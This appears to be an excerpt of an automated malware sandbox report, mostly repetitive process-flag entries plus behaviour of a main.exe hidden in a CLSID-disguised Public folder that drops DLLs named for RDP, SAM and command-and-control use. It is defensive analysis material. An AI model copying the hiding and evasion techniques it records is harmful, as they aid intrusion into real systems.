                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,20_2_00007FFE0EB434F4
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,31_2_00007FFE116E34F4
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,20_2_00007FFE0E162BA8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,20_2_00007FFE0EB45728
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,20_2_00007FFE0EBD2BA8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,20_2_00007FFE0EC02CE8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,20_2_00007FFE11502278
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,20_2_00007FFE13301D98
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,31_2_00007FFE116B2BA8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,31_2_00007FFE116E5728
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,31_2_00007FFE11712BA8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,31_2_00007FFE11742CE8
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,31_2_00007FFE11772278
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5789Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4067Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8826Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 697Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7894Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1724Jump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ieIgHN2AJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\wwgq2y6SJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\9m9shiPjJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\TzijR9ktJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ia0qD2w9Jump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\I2HoxnamJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\NCdDxWNeJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\oWkqS6JiJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\6DPA479IJump to dropped file
